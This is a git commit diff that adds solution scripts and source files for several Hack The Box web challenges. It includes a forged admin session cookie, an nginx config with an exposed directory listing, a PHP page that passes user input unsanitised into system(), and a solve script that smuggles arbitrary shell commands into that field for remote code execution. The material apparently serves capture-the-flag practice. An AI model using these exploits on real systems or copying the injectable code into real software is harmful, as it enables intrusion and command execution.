Added initial code.

2024-07-03 21:06:15 +02:00 · 2024-07-03 21:06:15 +02:00 · 1f7a9b0566
commit 1f7a9b0566
parent 5808d2f805
22 changed files with 309132 additions and 1 deletions
--- a/htb/challenges/web-baby-auth/solve.py
+++ b/htb/challenges/web-baby-auth/solve.py
@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+
+import requests
+
+ip = '188.166.175.58'   # change this
+port = '32249'          # change this
+
+cookies = { 'PHPSESSID': 'eyJ1c2VybmFtZSI6ImFkbWluIn0K' }
+data = { 'username': 'admin', 'password': 'admin' }
+
+r = requests.get(f'http://{ip}:{port}/', data = data, cookies = cookies)
+
+data = r.text
+data = data.split('<h1>')[-1]
+data = data.split('</h1>')[0]
+
+print(data.strip())
--- a/htb/challenges/web-baby-nginxatsu/config_51
+++ b/htb/challenges/web-baby-nginxatsu/config_51
@ -0,0 +1,45 @@
+user www;
+pid /run/nginx.pid;
+error_log /dev/stderr info;
+
+events {
+    worker_connections 1024;
+}
+
+http {
+    server_tokens off;
+
+    charset utf-8;
+    keepalive_timeout 20s;
+    sendfile on;
+    tcp_nopush on;
+    client_max_body_size 2M;
+
+    include  /etc/nginx/mime.types;
+
+    server {
+        listen 80;
+        server_name _;
+
+        index index.php;
+        root /www/public;
+
+        # We sure hope so that we don't spill any secrets
+        # within the open directory on /storage
+
+        location /storage {
+            autoindex on;
+        }
+
+        location / {
+            try_files $uri $uri/ /index.php?$query_string;
+            location ~ \.php$ {
+                try_files $uri =404;
+                fastcgi_pass unix:/run/php-fpm.sock;
+                fastcgi_index index.php;
+                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+                include fastcgi_params;
+            }
+        }
+    }
+}
--- a/htb/challenges/web-looking-glass/index.php
+++ b/htb/challenges/web-looking-glass/index.php
@ -0,0 +1,19 @@
+<?php
+function getUserIp()
+{
+    return $_SERVER['REMOTE_ADDR'];
+}
+
+function runTest($test, $ip_address)
+{
+    if ($test === 'ping')
+    {
+        system("ping -c4 ${ip_address}");
+    }
+    if ($test === 'traceroute')
+    {
+        system("traceroute ${ip_address}");
+    }
+}
+
+?>
--- a/htb/challenges/web-looking-glass/solve.py
+++ b/htb/challenges/web-looking-glass/solve.py
@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+
+from requests import post
+
+cmd = input('rce>> ')
+ip = '159.65.20.166'    # change this
+port = '30526'          # change this
+
+data = {'test': 'ping', 'ip_address': f'{ip}; {cmd}', 'submit': 'Test'}
+r = post(f'{ip}:{port}/', data=data)
+
+data = r.text
+data = data.split('packet loss\n')[-1]
+data = data.split('</textarea>')[0]
+
+print(data.strip())